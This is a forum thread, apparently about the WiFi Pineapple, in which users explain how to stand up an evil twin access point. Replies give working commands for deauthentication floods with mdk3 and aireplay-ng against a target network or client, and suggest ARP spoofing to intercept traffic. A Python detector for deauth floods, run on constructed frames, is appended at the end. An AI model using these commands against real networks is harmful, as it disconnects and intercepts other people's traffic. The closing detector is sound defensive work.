
Attack guidance


pabo2uk


Now I'm a bit more comfortable with the Pineapple, I thought I'd explore more creative ways of spoofing APs and devices. I'm not quite sure what kind of attack this is called (I think evil twin attack; I may be mistaken) but have followed some advice on how to pull off this particular attack. The bottom line is I cannot get it to work and would like some guidance please.

Essentially I'm trying to spoof a WPA protected AP and get one of its clients connecting to my MKV rather than the AP it thinks it's connected to.

So this is what I have done......

PART 1.

1. Log into the Pineapple and change the SSID of the AP to the target AP, in this case Epsilon2, and also set the passkey of Epsilon2, which I already know!

PART 2

1. SSH into Pineapple

2. airmon-ng start wlan1

3. airodump-ng -c 11 --bssid <00:11:22:33:44:55> wlan1 - LET THIS RUN AND WAIT FOR ANY DEVICE TO CONNECT

4. Once a device has connected I will note the device's MAC address

5. aireplay-ng -0 5 -a <00:11:22:33:44:55> -c <55:44:33:22:11:00> wlan1 - LET THIS RUN

6. I can see that the ACKs are being sent on both the AP and client

But it just doesn't work. What am I doing wrong? Do I have to set the channel on the interface for this to work, maybe?

Thanks guys


As far as I am aware, this is incredibly difficult if not impossible to do.

If the ESSID and MAC of the pineapple match that of the AP (including the encryption, of course), then the two access points will both "compete" for the AP and will result in the client not connecting at all. It's a security feature of WPA and WEP that isn't in open networks - which is why Karma only works with open APs.

If you know the password, just connect to it in client mode and use arpspoof to route all the other client connections through you.


Thanks for the response.

I can probably get my next question by looking on youtube, but gonna ask anyway......

I have come across arpspoofing before and have ATTEMPTED to play with it using Kali Linux...... How would I go about using the commands while SSH'd into the Pineapple?? In fact, what are the commands? Are there any good arpspoofing tutorials?

Thanks


As far as I am aware, this is incredibly difficult if not impossible to do.

Maybe you are mistaking it with something else :unsure:

Step 1

Configure your AP to have exactly the same SSID, ENCRYPTION and PASSKEY as the root AP BUT a different channel. The channel of your AP should be at least 3 channels away from the root AP (e.g. if the root AP channel is 11, yours should be 7 at most; I would have set it to 1).

Step 2

To deauth clients from the root AP you will need a second wireless card (e.g. wlan1) and use aireplay-ng or mdk3 deauth mode. I suggest mdk3. If you do not run any deauth attack, use the same channel as the root AP. In this case new clients will connect to the AP with the better/stronger signal quality/strength and the already connected clients will stay connected to the root AP.

Run this to install mdk3

opkg update
opkg install mdk3

and this to see mdk3 options

mdk3 --fullhelp

to run the deauth attack with mdk3 run:

ifconfig wlan1 down
airmon-ng start wlan1
echo {root_ap_bssid} > black.list
mdk3 {monitor_int} d -c {root_ap_channel} -b black.list

(replace {root_ap_bssid}, {monitor_int} and {root_ap_channel})

If you still want to use aireplay-ng and deauth every client from the root AP run:

ifconfig wlan1 down
iwconfig wlan1 channel {root_ap_channel}
airmon-ng start wlan1
aireplay-ng -0 100 -a {root_ap_bssid} {monitor_int}

(replace {root_ap_channel}, {root_ap_bssid} and {monitor_int})

Else if you want to deauth only one client run:

ifconfig wlan1 down
iwconfig wlan1 channel {root_ap_channel}
airmon-ng start wlan1
aireplay-ng -0 100 -a {root_ap_bssid} -c {client_bssid} {monitor_int}

(replace {root_ap_channel}, {root_ap_bssid}, {client_bssid} and {monitor_int})

Edited by KiatoGS

Thanks for the very informative response - I shall definitely give this a bash and let you know the results.

Quick question, please can you explain the difference between mdk3 and aireplay, all I know is that they are deauth tools....

Thanks


What do you mean by add clients? Does it just overload it with fake clients causing the AP to crash? Also when you say crash, is that just crashing the WiFi part of the router?! By the sound of things (I'm guessing) mdk3 is a better choice? Sorry for all the annoying questions, I'm just interested in how it all works.....

Thanks


Thanks for all the support guys..... Just one last question... PROMISE :)

Earlier in this thread KiatoGS kindly put down some mdk3 commands; can you just explain what the commands are doing?

echo {root_ap_bssid} > black.list

mdk3 {monitor_int} d -c {root_ap_channel} -b black.list

Thanks


echo {root_ap_bssid} > black.list = create a file called black.list with the AP bssid

mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = Run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on the AP channel (-c 6) with the blacklist file you created above (-b)



TYTecholust this is correct! I just want to add some details... In the black.list you can add as many APs as you like. The format of the file should be this:

root@kiatogs:~# cat black.list
CC:1A:FA:9F:3D:14
C1:F4:56:7A:23:35
38:22:FF:A2:65:F1
root@kiatogs:~#

If the APs you want to deauth (and their bssids are in the black.list) are on different channels you can use:

mdk3 mon0 d -c 1,6,11,13 -b black.list

This command will use interface mon0 and the mdk3 will search for the bssids that are in the black.list at the channels 1, 6, 11 and 13.

If the -c parameter is not given, mdk3 will hop across all channels to find those BSSIDs.

You can find out more by typing:

mdk3 --fullhelp

or:

man mdk3
Edited by KiatoGS
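The defender-side counterpart to the mdk3 and aireplay-ng deauth runs described in this thread, as an added example that is not part of any post here: a small parser for raw 802.11 management headers and a sliding-window check that flags a BSSID receiving a burst of deauthentication or disassociation frames, the signal a wireless IDS would alert on. The BSSIDs, timestamps and frames below are constructed; a real deployment would feed it frames from a monitor-mode capture after stripping the radiotap header.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
TARGET_AP = "02:00:00:aa:bb:cc"  # constructed BSSID, stands in for the AP in black.list
OTHER_AP = "02:00:00:dd:ee:ff"   # constructed BSSID seeing only normal, sparse deauths

def build_frame(fc0, addr1, addr2, addr3, body=b""):
    # Bare 802.11 MAC header (no radiotap): FC, duration, addr1/2/3, seq ctl, then body.
    macs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (addr1, addr2, addr3))
    return bytes([fc0, 0x00]) + b"\x00\x00" + macs + b"\x00\x00" + body

def parse_frame(raw):
    """Return type, subtype and the three addresses of one raw frame (None if truncated)."""
    if len(raw) < 24:
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return {"type": (raw[0] >> 2) & 0x3, "subtype": (raw[0] >> 4) & 0xF,
            "addr1": mac(raw[4:10]), "addr2": mac(raw[10:16]), "addr3": mac(raw[16:22])}

def detect_deauth_flood(frames, threshold=5, window=2.0):
    """frames: iterable of (timestamp_s, raw_bytes). Returns {bssid: peak} for BSSIDs that
    saw >= threshold deauth (subtype 12) or disassoc (subtype 10) frames in any `window` s.
    Keying on addr3 (the BSSID) catches both AP->client and client->AP spoofed frames."""
    times = defaultdict(list)
    for ts, raw in frames:
        f = parse_frame(raw)
        if f and f["type"] == 0 and f["subtype"] in (10, 12):
            times[f["addr3"]].append(ts)
    flagged = {}
    for bssid, ts_list in times.items():
        ts_list.sort()
        peak = start = 0
        for end in range(len(ts_list)):          # sliding window over sorted timestamps
            while ts_list[end] - ts_list[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[bssid] = peak
    return flagged

# Constructed capture: 8 broadcast deauths spoofed from TARGET_AP inside 0.7 s (a tool-style
# burst) mixed with beacons and data, plus two deauths from OTHER_AP 90 s apart (normal churn).
REASON = b"\x07\x00"  # reason code 7 (class 3 frame from non-associated STA), little-endian
SAMPLE_FRAMES = (
    [(0.1 * i, build_frame(0xC0, BROADCAST, TARGET_AP, TARGET_AP, REASON)) for i in range(8)]
    + [(0.1 * i, build_frame(0x80, BROADCAST, TARGET_AP, TARGET_AP)) for i in range(3)]
    + [(0.35, build_frame(0x08, TARGET_AP, "02:00:00:11:22:33", TARGET_AP))]
    + [(t, build_frame(0xC0, "02:00:00:44:55:66", OTHER_AP, OTHER_AP, REASON)) for t in (5.0, 95.0)]
)
```

Tune `threshold` and `window` to the roaming behaviour of your own network; a single deauth is routine, a burst keyed to one BSSID is not.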
